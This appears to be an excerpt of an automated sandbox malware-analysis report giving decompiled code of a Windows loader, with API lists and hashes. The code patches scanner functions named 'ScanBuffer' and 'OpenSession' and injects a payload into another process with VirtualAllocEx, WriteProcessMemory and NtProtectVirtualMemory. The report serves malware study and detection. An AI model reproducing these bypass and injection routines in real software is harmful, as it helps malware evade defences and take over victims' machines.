					E02174A98( &_v36, E02174D64(_v40));
					_pop(_t653); // executed
					E02183690(_v36, 0x2194598, _t653, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v44, E02174D64(_v48));
					_push(_v44);
					E02174BB0( &_v56,  *0x2194598, 0x2188438);
					E02174A98( &_v52, E02174D64(_v56));
					_pop(_t658); // executed
					E02183690(_v52, 0x2194598, _t658, 0x2194520); // executed
					_v5 = 0;
					_push(0);
					_push(_v4);
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					 *0x219451c =  *((intOrPtr*)(_v4 + 0x3c)) + _v76;
					 *0x2194524 = 0x10000000;
					do {
						_push(0x2188438);
						_push( *0x2194598);
						_push(0x2188480);
						_push(0x218848c);
						_push(0x2188498);
						_push(0x21884a4);
						_push( *0x2194598);
						_push(0x21884b0);
						_push(0x21884bc);
						E02174C24();
						E02174A98( &_v60, E02174D64(_v64));
						_push(_v60);
						E02174BB0( &_v72,  *0x2194598, 0x2188438);
						E02174A98( &_v68, E02174D64(_v72));
						_pop(_t664); // executed
						E02183690(_v68, 0x2194598, _t664, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v76, E02174D64(_v80));
						_push(_v76);
						E02174BB0( &_v88,  *0x2194598, 0x2188438);
						E02174A98( &_v84, E02174D64(_v88));
						_pop(_t669); // executed
						E02183690(_v84, 0x2194598, _t669, 0x2194520); // executed
						 *0x2194524 =  *0x2194524 + 0x10000;
						_t295 =  *0x219451c; // 0x4a7fda0
						_t56 = _t295 + 0x50; // 0x29000
						_t297 =  *0x219451c; // 0x4a7fda0
						_t57 = _t297 + 0x34; // 0x400000
						_t300 = VirtualAlloc( *_t57 +  *0x2194524,  *_t56, 0x3000, 0x40); // executed
						 *0x2194520 = _t300;
						_push(0x2188438);
						_push( *0x2194598);
						_push("UacScan");
						E02174C24();
						E02174A98( &_v92, E02174D64(_v96));
						_push(_v92);
						E02174BB0( &_v104,  *0x2194598, 0x2188438);
						E02174A98( &_v100, E02174D64(_v104));
						_pop(_t674); // executed
						E02183690(_v100, 0x2194598, _t674, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v108, E02174D64(_v112));
						_push(_v108);
						E02174BB0( &_v120,  *0x2194598, 0x2188438);
						E02174A98( &_v116, E02174D64(_v120));
						_pop(_t679); // executed
						E02183690(_v116, 0x2194598, _t679, 0x2194520); // executed
						if( *0x2194520 != 0) {
							_push(0x2188438);
							_push( *0x2194598);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v124, E02174D64(_v128));
							_push(_v124);
							E02174BB0( &_v136,  *0x2194598, 0x2188438);
							E02174A98( &_v132, E02174D64(_v136));
							_pop(_t758); // executed
							E02183690(_v132, 0x2194598, _t758, 0x2194520); // executed
							_push(0x2188438);
							_push( *0x2194598);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v140, E02174D64(_v144));
							_push(_v140);
							E02174BB0( &_v152,  *0x2194598, 0x2188438);
							E02174A98( &_v148, E02174D64(_v152));
							_pop(_t763); // executed
							E02183690(_v148, 0x2194598, _t763, 0x2194520); // executed
							_push(0x2188438);
							_push( *0x2194598);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v156, E02174D64(_v160));
							_push(_v156);
							E02174BB0( &_v168,  *0x2194598, 0x2188438);
							E02174A98( &_v164, E02174D64(_v168));
							_pop(_t768); // executed
							E02183690(_v164, 0x2194598, _t768, 0x2194520); // executed
							E02174A98( &_v172, "kernel32");
							_t587 = E0217CAC8(_v172, 0x2194598, 0x8000); // executed
							 *0x21945ac = _t587;
							_t588 =  *0x21945ac; // 0x76670000
							 *0x21945a4 = GetProcAddress(_t588, "VirtualFree");
							_t590 =  *0x21945ac; // 0x76670000
							FreeLibrary(_t590);
							VirtualFree( *0x2194520, 0, 0x8000); // executed
							_t594 =  *0x219451c; // 0x4a7fda0
							_t100 = _t594 + 0x50; // 0x29000
							_t596 =  *0x219451c; // 0x4a7fda0
							_t101 = _t596 + 0x34; // 0x400000
							_t599 = VirtualAllocEx(_t775,  *_t101 +  *0x2194524,  *_t100, 0x3000, 0x40); // executed
							 *0x2194520 = _t599;
						}
					} while ( *0x2194520 == 0 &&  *0x2194524 <= 0x30000000);
					_push(0x2188438);
					_push( *0x2194598);
					_push(0x2188480);
					_push(0x218848c);
					_push(0x2188498);
					_push(0x21884a4);
					_push( *0x2194598);
					_push(0x21884b0);
					_push(0x21884bc);
					E02174C24();
					E02174A98( &_v176, E02174D64(_v180));
					_push(_v176);
					E02174BB0( &_v188,  *0x2194598, 0x2188438);
					E02174A98( &_v184, E02174D64(_v188));
					_pop(_t684); // executed
					E02183690(_v184, 0x2194598, _t684, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v192, E02174D64(_v196));
					_push(_v192);
					E02174BB0( &_v204,  *0x2194598, 0x2188438);
					E02174A98( &_v200, E02174D64(_v204));
					_pop(_t689); // executed
					E02183690(_v200, 0x2194598, _t689, 0x2194520); // executed
					_push(0x2188438);
					_push( *0x2194598);
					_push(0x2188480);
					_push(0x218848c);
					_push(0x2188498);
					_push(0x21884a4);
					_push( *0x2194598);
					_push(0x21884b0);
					_push(0x21884bc);
					E02174C24();
					E02174A98( &_v208, E02174D64(_v212));
					_push(_v208);
					E02174BB0( &_v220,  *0x2194598, 0x2188438);
					E02174A98( &_v216, E02174D64(_v220));
					_pop(_t694); // executed
					E02183690(_v216, 0x2194598, _t694, 0x2194520); // executed
					_push( &_v240);
					E02186388(); // executed
					_t623 =  *0x2185930; // 0x2185934
					E021755FC(0x21944fc, _t623,  &_v240);
					if( *0x21944fc != 0) {
						_push(0x2188438);
						_push( *0x2194598);
						_push(0x2188480);
						_push(0x218848c);
						_push(0x2188498);
						_push(0x21884a4);
						_push( *0x2194598);
						_push(0x21884b0);
						_push(0x21884bc);
						E02174C24();
						E02174A98( &_v244, E02174D64(_v248));
						_push(_v244);
						E02174BB0( &_v256,  *0x2194598, 0x2188438);
						E02174A98( &_v252, E02174D64(_v256));
						_pop(_t705); // executed
						E02183690(_v252, 0x2194598, _t705, 0x2194520);
						_t396 =  *0x21944fc; // 0x10410000
						 *0x2194510 = _t396;
						_push(0x2188438);
						_push( *0x2194598);
						_push(0x2188480);
						_push(0x218848c);
						_push(0x2188498);
						_push(0x21884a4);
						_push( *0x2194598);
						_push(0x21884b0);
						_push(0x21884bc);
						E02174C24();
						E02174A98( &_v260, E02174D64(_v264));
						_push(_v260);
						E02174BB0( &_v272,  *0x2194598, 0x2188438);
						E02174A98( &_v268, E02174D64(_v272));
						_pop(_t710); // executed
						E02183690(_v268, 0x2194598, _t710, 0x2194520);
						_t411 =  *0x2194508; // 0x1042d450
						 *0x2194514 = _t411;
						_push(0x2188438);
						_push( *0x2194598);
						_push("Initialize");
						E02174C24();
						E02174A98( &_v276, E02174D64(_v280));
						_push(_v276);
						E02174BB0( &_v288,  *0x2194598, 0x2188438);
						E02174A98( &_v284, E02174D64(_v288));
						_pop(_t715); // executed
						E02183690(_v284, 0x2194598, _t715, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v292, E02174D64(_v296));
						_push(_v292);
						E02174BB0( &_v304,  *0x2194598, 0x2188438);
						E02174A98( &_v300, E02174D64(_v304));
						_pop(_t720); // executed
						E02183690(_v300, 0x2194598, _t720, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v308, E02174D64(_v312));
						_push(_v308);
						E02174BB0( &_v320,  *0x2194598, 0x2188438);
						E02174A98( &_v316, E02174D64(_v320));
						_pop(_t725); // executed
						E02183690(_v316, 0x2194598, _t725, 0x2194520); // executed
						E02174A98( &_v324, "kernel32");
						_t457 = E0217CAC8(_v324, 0x2194598, 0x8000); // executed
						 *0x21945ac = _t457;
						_t458 =  *0x21945ac; // 0x76670000
						 *0x21945a8 = GetProcAddress(_t458, "WriteProcessMemory");
						_t460 =  *0x21945ac; // 0x76670000
						FreeLibrary(_t460);
						_t462 =  *0x2194500; // 0x29000
						_t463 =  *0x21944fc; // 0x10410000
						WriteProcessMemory(_t775,  *0x2194520, _t463, _t462, 0x2194518); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v328, E02174D64(_v332));
						_push(_v328);
						E02174BB0( &_v340,  *0x2194598, 0x2188438);
						E02174A98( &_v336, E02174D64(_v340));
						_pop(_t732); // executed
						E02183690(_v336, 0x2194598, _t732, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("Initialize");
						E02174C24();
						E02174A98( &_v344, E02174D64(_v348));
						_push(_v344);
						E02174BB0( &_v356,  *0x2194598, 0x2188438);
						E02174A98( &_v352, E02174D64(_v356));
						_pop(_t737); // executed
						E02183690(_v352, 0x2194598, _t737, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v360, E02174D64(_v364));
						_push(_v360);
						E02174BB0( &_v372,  *0x2194598, 0x2188438);
						E02174A98( &_v368, E02174D64(_v372));
						_pop(_t742); // executed
						E02183690(_v368, 0x2194598, _t742, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v376, E02174D64(_v380));
						_push(_v376);
						E02174BB0( &_v388,  *0x2194598, 0x2188438);
						E02174A98( &_v384, E02174D64(_v388));
						_pop(_t747); // executed
						E02183690(_v384, 0x2194598, _t747, 0x2194520); // executed
						_push(0x2188438);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v392, E02174D64(_v396));
						_push(_v392);
						E02174BB0( &_v404,  *0x2194598, 0x2188438);
						E02174A98( &_v400, E02174D64(_v404));
						_pop(_t752); // executed
						E02183690(_v400, 0x2194598, _t752, 0x2194520); // executed
						E02185B0C(_t775, 0x2194510, E02187774, 0, 8);
						_t538 =  *0x2194518; // 0x71
						_t539 =  *0x2194500; // 0x29000
						NtProtectVirtualMemory(_t775,  *0x2194520, _t539, 1, _t538);
					}
					_pop(_t697);
					 *[fs:eax] = _t697;
					_push(E02188408);
					E021748C4( &_v404, 0x29);
					_t699 =  *0x2185930; // 0x2185934
					E02175398( &_v240, _t699);
					return E021748C4( &_v220, 0x35);
				} else {
					 *_t215 = _t215 +  *_t215;
					asm("invalid");
					asm("invalid");
					_t602 = _t215 +  *_t215;
					 *_t602 =  *_t602 + _t602;
					asm("outsb");
					 *_t602 =  *_t602 + _t602;
					asm("invalid");
					asm("invalid");
					_t603 = _t602 +  *_t602;
					 *_t603 =  *_t603 + _t603;
					if ( *_t603 >= 0) goto L2;
					asm("invalid");
					 *((intOrPtr*)(__ecx)) =  *((intOrPtr*)(__ecx)) + 1;
					 *_t603 =  *_t603 + _t603;
					 *__edi =  *__edi + __ecx;
					 *_t603 =  *_t603 + _t603;
					asm("invalid");
					asm("invalid");
					 *_t603 =  *_t603 + _t603;
					 *_t603 =  *_t603 + _t603;
					asm("outsb");
					 *_t603 =  *_t603 + _t603;
					_v117 = _v117 + __edx;
					_t604 = _v0;
					_v16 =  *_t604;
					_v12 =  *((intOrPtr*)(_t604 + 4));
					_v12(_v16, 1, 0, _t778, __ebx);
					return 0;
				}
			}



























































































































































                                                                                                0x0218773c
                                                                                                0x0218773c
                                                                                                0x0218773c
                                                                                                0x0218773c
                                                                                                0x0218773c
                                                                                                0x0218773e
                                                                                                0x02187740
                                                                                                0x021877a7
                                                                                                0x021877a7
                                                                                                0x021877a9
                                                                                                0x021877aa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021877a5
                                                                                                0x021877a5
                                                                                                0x021877ac
                                                                                                0x021877ac
                                                                                                0x021877b0
                                                                                                0x021877b2
                                                                                                0x021877b5
                                                                                                0x021877c3
                                                                                                0x021877c4
                                                                                                0x021877c9
                                                                                                0x021877cc
                                                                                                0x021877d4
                                                                                                0x021877d9
                                                                                                0x021877da
                                                                                                0x021877e1
                                                                                                0x021877f8
                                                                                                0x021877e3
                                                                                                0x021877ea
                                                                                                0x021877ea
                                                                                                0x021877fd
                                                                                                0x02187802
                                                                                                0x02187804
                                                                                                0x02187811
                                                                                                0x02187823
                                                                                                0x0218782b
                                                                                                0x02187836
                                                                                                0x02187848
                                                                                                0x02187850
                                                                                                0x02187851
                                                                                                0x02187856
                                                                                                0x0218785b
                                                                                                0x0218785d
                                                                                                0x0218786a
                                                                                                0x0218787c
                                                                                                0x02187884
                                                                                                0x0218788f
                                                                                                0x021878a1
                                                                                                0x021878a9
                                                                                                0x021878aa
                                                                                                0x021878af
                                                                                                0x021878b4
                                                                                                0x021878b6
                                                                                                0x021878c3
                                                                                                0x021878d5
                                                                                                0x021878dd
                                                                                                0x021878e8
                                                                                                0x021878fa
                                                                                                0x02187902
                                                                                                0x02187903
                                                                                                0x02187908
                                                                                                0x02187911
                                                                                                0x02187912
                                                                                                0x02187919
                                                                                                0x0218791d
                                                                                                0x02187924
                                                                                                0x02187929
                                                                                                0x02187933
                                                                                                0x02187933
                                                                                                0x02187938
                                                                                                0x0218793a
                                                                                                0x0218793f
                                                                                                0x02187944
                                                                                                0x02187949
                                                                                                0x0218794e
                                                                                                0x02187950
                                                                                                0x02187955
                                                                                                0x02187962
                                                                                                0x02187974
                                                                                                0x0218797c
                                                                                                0x02187987
                                                                                                0x02187999
                                                                                                0x021879a1
                                                                                                0x021879a2
                                                                                                0x021879a7
                                                                                                0x021879ac
                                                                                                0x021879ae
                                                                                                0x021879bb
                                                                                                0x021879cd
                                                                                                0x021879d5
                                                                                                0x021879e0
                                                                                                0x021879f2
                                                                                                0x021879fa
                                                                                                0x021879fb
                                                                                                0x02187a00
                                                                                                0x02187a11
                                                                                                0x02187a16
                                                                                                0x02187a1a
                                                                                                0x02187a1f
                                                                                                0x02187a29
                                                                                                0x02187a2e
                                                                                                0x02187a30
                                                                                                0x02187a35
                                                                                                0x02187a37
                                                                                                0x02187a44
                                                                                                0x02187a56
                                                                                                0x02187a5e
                                                                                                0x02187a69
                                                                                                0x02187a7b
                                                                                                0x02187a83
                                                                                                0x02187a84
                                                                                                0x02187a89
                                                                                                0x02187a8e
                                                                                                0x02187a90
                                                                                                0x02187a9d
                                                                                                0x02187aaf
                                                                                                0x02187ab7
                                                                                                0x02187ac2
                                                                                                0x02187ad4
                                                                                                0x02187adc
                                                                                                0x02187add
                                                                                                0x02187ae5
                                                                                                0x02187aeb
                                                                                                0x02187af0
                                                                                                0x02187af2
                                                                                                0x02187aff
                                                                                                0x02187b11
                                                                                                0x02187b19
                                                                                                0x02187b27
                                                                                                0x02187b3f
                                                                                                0x02187b4a
                                                                                                0x02187b4b
                                                                                                0x02187b50
                                                                                                0x02187b55
                                                                                                0x02187b57
                                                                                                0x02187b67
                                                                                                0x02187b7f
                                                                                                0x02187b8a
                                                                                                0x02187b98
                                                                                                0x02187bb0
                                                                                                0x02187bbb
                                                                                                0x02187bbc
                                                                                                0x02187bc1
                                                                                                0x02187bc6
                                                                                                0x02187bc8
                                                                                                0x02187bd8
                                                                                                0x02187bf0
                                                                                                0x02187bfb
                                                                                                0x02187c09
                                                                                                0x02187c21
                                                                                                0x02187c2c
                                                                                                0x02187c2d
                                                                                                0x02187c3d
                                                                                                0x02187c4d
                                                                                                0x02187c52
                                                                                                0x02187c5c
                                                                                                0x02187c67
                                                                                                0x02187c6c
                                                                                                0x02187c72
                                                                                                0x02187c81
                                                                                                0x02187c8e
                                                                                                0x02187c93
                                                                                                0x02187c97
                                                                                                0x02187c9c
                                                                                                0x02187ca7
                                                                                                0x02187cac
                                                                                                0x02187cac
                                                                                                0x02187cae
                                                                                                0x02187cc3
                                                                                                0x02187cc8
                                                                                                0x02187cca
                                                                                                0x02187ccf
                                                                                                0x02187cd4
                                                                                                0x02187cd9
                                                                                                0x02187cde
                                                                                                0x02187ce0
                                                                                                0x02187ce5
                                                                                                0x02187cf5
                                                                                                0x02187d0d
                                                                                                0x02187d18
                                                                                                0x02187d26
                                                                                                0x02187d3e
                                                                                                0x02187d49
                                                                                                0x02187d4a
                                                                                                0x02187d4f
                                                                                                0x02187d54
                                                                                                0x02187d56
                                                                                                0x02187d66
                                                                                                0x02187d7e
                                                                                                0x02187d89
                                                                                                0x02187d97
                                                                                                0x02187daf
                                                                                                0x02187dba
                                                                                                0x02187dbb
                                                                                                0x02187dc0
                                                                                                0x02187dc5
                                                                                                0x02187dc7
                                                                                                0x02187dcc
                                                                                                0x02187dd1
                                                                                                0x02187dd6
                                                                                                0x02187ddb
                                                                                                0x02187ddd
                                                                                                0x02187de2
                                                                                                0x02187df2
                                                                                                0x02187e0a
                                                                                                0x02187e15
                                                                                                0x02187e23
                                                                                                0x02187e3b
                                                                                                0x02187e46
                                                                                                0x02187e47
                                                                                                0x02187e52
                                                                                                0x02187e5a
                                                                                                0x02187e6a
                                                                                                0x02187e70
                                                                                                0x02187e7c
                                                                                                0x02187e82
                                                                                                0x02187e87
                                                                                                0x02187e89
                                                                                                0x02187e8e
                                                                                                0x02187e93
                                                                                                0x02187e98
                                                                                                0x02187e9d
                                                                                                0x02187e9f
                                                                                                0x02187ea4
                                                                                                0x02187eb4
                                                                                                0x02187ecc
                                                                                                0x02187ed7
                                                                                                0x02187ee5
                                                                                                0x02187efd
                                                                                                0x02187f08
                                                                                                0x02187f09
                                                                                                0x02187f0e
                                                                                                0x02187f13
                                                                                                0x02187f18
                                                                                                0x02187f1d
                                                                                                0x02187f1f
                                                                                                0x02187f24
                                                                                                0x02187f29
                                                                                                0x02187f2e
                                                                                                0x02187f33
                                                                                                0x02187f35
                                                                                                0x02187f3a
                                                                                                0x02187f4a
                                                                                                0x02187f62
                                                                                                0x02187f6d
                                                                                                0x02187f7b
                                                                                                0x02187f93
                                                                                                0x02187f9e
                                                                                                0x02187f9f
                                                                                                0x02187fa4
                                                                                                0x02187fa9
                                                                                                0x02187fae
                                                                                                0x02187fb3
                                                                                                0x02187fb5
                                                                                                0x02187fc5
                                                                                                0x02187fdd
                                                                                                0x02187fe8
                                                                                                0x02187ff6
                                                                                                0x0218800e
                                                                                                0x02188019
                                                                                                0x0218801a
                                                                                                0x0218801f
                                                                                                0x02188024
                                                                                                0x02188026
                                                                                                0x02188036
                                                                                                0x0218804e
                                                                                                0x02188059
                                                                                                0x02188067
                                                                                                0x0218807f
                                                                                                0x0218808a
                                                                                                0x0218808b
                                                                                                0x02188090
                                                                                                0x02188095
                                                                                                0x02188097
                                                                                                0x021880a7
                                                                                                0x021880bf
                                                                                                0x021880ca
                                                                                                0x021880d8
                                                                                                0x021880f0
                                                                                                0x021880fb
                                                                                                0x021880fc
                                                                                                0x0218810c
                                                                                                0x0218811c
                                                                                                0x02188121
                                                                                                0x0218812b
                                                                                                0x02188136
                                                                                                0x0218813b
                                                                                                0x02188141
                                                                                                0x0218814b
                                                                                                0x02188151
                                                                                                0x0218815b
                                                                                                0x02188161
                                                                                                0x02188166
                                                                                                0x02188168
                                                                                                0x02188178
                                                                                                0x02188190
                                                                                                0x0218819b
                                                                                                0x021881a9
                                                                                                0x021881c1
                                                                                                0x021881cc
                                                                                                0x021881cd
                                                                                                0x021881d2
                                                                                                0x021881d7
                                                                                                0x021881d9
                                                                                                0x021881e9
                                                                                                0x02188201
                                                                                                0x0218820c
                                                                                                0x0218821a
                                                                                                0x02188232
                                                                                                0x0218823d
                                                                                                0x0218823e
                                                                                                0x02188243
                                                                                                0x02188248
                                                                                                0x0218824a
                                                                                                0x0218825a
                                                                                                0x02188272
                                                                                                0x0218827d
                                                                                                0x0218828b
                                                                                                0x021882a3
                                                                                                0x021882ae
                                                                                                0x021882af
                                                                                                0x021882b4
                                                                                                0x021882b9
                                                                                                0x021882bb
                                                                                                0x021882cb
                                                                                                0x021882e3
                                                                                                0x021882ee
                                                                                                0x021882fc
                                                                                                0x02188314
                                                                                                0x0218831f
                                                                                                0x02188320
                                                                                                0x02188325
                                                                                                0x0218832a
                                                                                                0x0218832c
                                                                                                0x0218833c
                                                                                                0x02188354
                                                                                                0x0218835f
                                                                                                0x0218836d
                                                                                                0x02188385
                                                                                                0x02188390
                                                                                                0x02188391
                                                                                                0x021883a6
                                                                                                0x021883ab
                                                                                                0x021883b3
                                                                                                0x021883bd
                                                                                                0x021883bd
                                                                                                0x021883c4
                                                                                                0x021883c7
                                                                                                0x021883ca
                                                                                                0x021883da
                                                                                                0x021883e5
                                                                                                0x021883eb
                                                                                                0x02188400
                                                                                                0x02187742
                                                                                                0x02187742
                                                                                                0x02187744
                                                                                                0x02187746
                                                                                                0x02187748
                                                                                                0x0218774a
                                                                                                0x0218774c
                                                                                                0x0218774e
                                                                                                0x02187750
                                                                                                0x02187752
                                                                                                0x02187754
                                                                                                0x02187756
                                                                                                0x02187758
                                                                                                0x0218775d
                                                                                                0x0218775f
                                                                                                0x02187761
                                                                                                0x02187763
                                                                                                0x02187766
                                                                                                0x02187768
                                                                                                0x0218776a
                                                                                                0x0218776c
                                                                                                0x0218776e
                                                                                                0x02187770
                                                                                                0x02187771
                                                                                                0x02187773
                                                                                                0x0218777a
                                                                                                0x0218777f
                                                                                                0x02187785
                                                                                                0x02187790
                                                                                                0x02187796
                                                                                                0x02187796

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02188401,?,?,?,?,00000000,00000000), ref: 021877DA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: Initialize$OpenSession$ScanBuffer$UacScan$VirtualFree$WriteProcessMemory$kernel32$teSe
                                                                                                • API String ID: 3180263700-2541080484
                                                                                                • Opcode ID: 7013e894898c0a905de0ef324509098ca8ffedae55c359a501bcccde8c3d663d
                                                                                                • Instruction ID: e922b500becd202101c4cafd5e61f099ba0de0b64ef42928aa0669f9f7592a28
                                                                                                • Opcode Fuzzy Hash: 7013e894898c0a905de0ef324509098ca8ffedae55c359a501bcccde8c3d663d
                                                                                                • Instruction Fuzzy Hash: 7C62E035AC02189FEB21FB64DCC0FDEB3B6AF85700F5184A6A145AB214DB70AE45CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218368E Relevance: 10.6, APIs: 7, Instructions: 73librarynativeloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 76%
                                                                                                			E0218368E(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				struct _ERESOURCE_LITE _t28;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				E02174D54(_v8);
				E02174D54(_v12);
				_push(_t43);
				_push(0x2183766);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				_t40 = E02174D64(_v8);
				_t16 = LoadLibraryA(_t40); // executed
				if(_t16 != 0) {
					 *0x21942f8 = GetModuleHandleA(_t40);
					if( *0x21942f8 != 0) {
						0;
						_t24 = E02174D64(_v12);
						_t25 =  *0x21942f8; // 0x77090000
						 *0x21942fc = GetProcAddress(_t25, _t24);
						if( *0x21942fc != 0) {
						}
						RtlMoveMemory(0x21942fc, 0x2176a20, 4);
						_t28 = E0217304C(7);
						NtFlushVirtualMemory(GetCurrentProcess(), 0x21942fc, 4, _t28);
					}
					_t21 =  *0x21942f8; // 0x77090000
					FreeLibrary(_t21);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E0218376D);
				return E021748C4( &_v12, 2);
			}













                                                                                                0x02183698
                                                                                                0x0218369b
                                                                                                0x021836a1
                                                                                                0x021836a9
                                                                                                0x021836b0
                                                                                                0x021836b1
                                                                                                0x021836b6
                                                                                                0x021836b9
                                                                                                0x021836c7
                                                                                                0x021836ca
                                                                                                0x021836d1
                                                                                                0x021836d9
                                                                                                0x021836e5
                                                                                                0x021836ed
                                                                                                0x021836f1
                                                                                                0x021836f7
                                                                                                0x02183702
                                                                                                0x0218370e
                                                                                                0x0218370e
                                                                                                0x0218371e
                                                                                                0x02183728
                                                                                                0x0218373b
                                                                                                0x0218373b
                                                                                                0x02183740
                                                                                                0x02183746
                                                                                                0x02183746
                                                                                                0x0218374d
                                                                                                0x02183750
                                                                                                0x02183753
                                                                                                0x02183765

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                • GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                • RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                • GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                • NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                • FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemory$AddressCurrentFlushFreeHandleLoadModuleMoveProcProcessVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1189176514-0
                                                                                                • Opcode ID: 00721fd1d4f37798326d1164655f49212d0917ef6945d54d2101c7f44d32bac2
                                                                                                • Instruction ID: d33a99b4aa1cc7e9bc50abc87d26944045ad28a30388389465be6d69d2598c29
                                                                                                • Opcode Fuzzy Hash: 00721fd1d4f37798326d1164655f49212d0917ef6945d54d2101c7f44d32bac2
                                                                                                • Instruction Fuzzy Hash: 11118EB0AC0604AEEB10FBA8D985A5EB7FDEB85B00F9508B4A460E3250DB349981CE54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02183690 Relevance: 10.6, APIs: 7, Instructions: 72librarynativeloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 76%
                                                                                                			E02183690(intOrPtr __eax, void* __ebx, char __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				struct _ERESOURCE_LITE _t28;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				E02174D54(_v8);
				E02174D54(_v12);
				_push(_t43);
				_push(0x2183766);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				_t40 = E02174D64(_v8);
				_t16 = LoadLibraryA(_t40); // executed
				if(_t16 != 0) {
					 *0x21942f8 = GetModuleHandleA(_t40);
					if( *0x21942f8 != 0) {
						0;
						_t24 = E02174D64(_v12);
						_t25 =  *0x21942f8; // 0x77090000
						 *0x21942fc = GetProcAddress(_t25, _t24);
						if( *0x21942fc != 0) {
						}
						RtlMoveMemory(0x21942fc, 0x2176a20, 4);
						_t28 = E0217304C(7);
						NtFlushVirtualMemory(GetCurrentProcess(), 0x21942fc, 4, _t28);
					}
					_t21 =  *0x21942f8; // 0x77090000
					FreeLibrary(_t21);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E0218376D);
				return E021748C4( &_v12, 2);
			}













                                                                                                0x02183698
                                                                                                0x0218369b
                                                                                                0x021836a1
                                                                                                0x021836a9
                                                                                                0x021836b0
                                                                                                0x021836b1
                                                                                                0x021836b6
                                                                                                0x021836b9
                                                                                                0x021836c7
                                                                                                0x021836ca
                                                                                                0x021836d1
                                                                                                0x021836d9
                                                                                                0x021836e5
                                                                                                0x021836ed
                                                                                                0x021836f1
                                                                                                0x021836f7
                                                                                                0x02183702
                                                                                                0x0218370e
                                                                                                0x0218370e
                                                                                                0x0218371e
                                                                                                0x02183728
                                                                                                0x0218373b
                                                                                                0x0218373b
                                                                                                0x02183740
                                                                                                0x02183746
                                                                                                0x02183746
                                                                                                0x0218374d
                                                                                                0x02183750
                                                                                                0x02183753
                                                                                                0x02183765

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
